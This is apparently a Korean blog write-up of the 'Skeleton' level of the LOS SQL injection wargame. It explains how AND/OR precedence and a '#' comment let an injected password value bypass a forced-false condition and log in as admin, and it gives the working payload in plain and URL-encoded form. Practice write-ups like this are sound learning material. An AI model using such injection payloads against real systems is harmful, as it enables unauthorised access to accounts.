반응형
10.Skeleton 풀이.
일단 연산자 우선 순위에 집중. 1=0은 무조건 FALSE. 주석 처리 하거나 없앤다.
if($result['id'] =='admin') solve("skeleton");
id = 'admin' 을 만족하면 풀리는 것이 비해
id = 'guest; and pw ='{$_GET[pw]}' and 1=0
즉 and 1 = 0 이라는 조건이 붙었는데 뒤에는 주석으로 생략.
연산자 우선 순위를 집중해서 보면 and가 or보다 빠르고, 주석으로 1=0을 없애는 것이 문제의 핵심.
id ='guest' and pw ='0' or id ='admin' and pw >0 # and 1=0 <= # 다음은 주석 처리.
or 뒤 부분의 조건이 검색되도록 하면 된다.
즉 ?pw=' or id = 'admin' %23
===>?pw=%27%20or%20id%20=%20%27admin%27%20%23
Cf) 연산자 우선 순위랑 주석 처리를 한다는 것만 알면 풀 수 있다.
반응형
'# Related site issues > LOS' 카테고리의 다른 글
| 12.Darkknight. (0) | 2018.05.07 |
|---|---|
| 11.Golem. (0) | 2018.05.07 |
| 9.Vampire. (0) | 2018.05.07 |
| 8.Troll. (0) | 2018.05.07 |
| 7.Orge. (0) | 2018.05.07 |
